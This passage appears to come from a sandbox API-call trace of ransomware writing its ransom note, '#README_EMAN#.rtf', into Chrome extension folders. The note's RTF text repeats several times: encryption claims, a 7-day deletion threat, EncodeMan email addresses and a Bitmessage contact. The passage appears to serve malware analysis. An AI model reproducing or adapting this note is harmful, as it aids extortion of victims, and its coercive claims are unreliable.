w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.045] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.045] CloseHandle (hObject=0x294) returned 1 [0285.045] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\#readme_eman#.rtf")) returned 0xffffffff [0285.046] GetLastError () returned 0x2 [0285.046] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 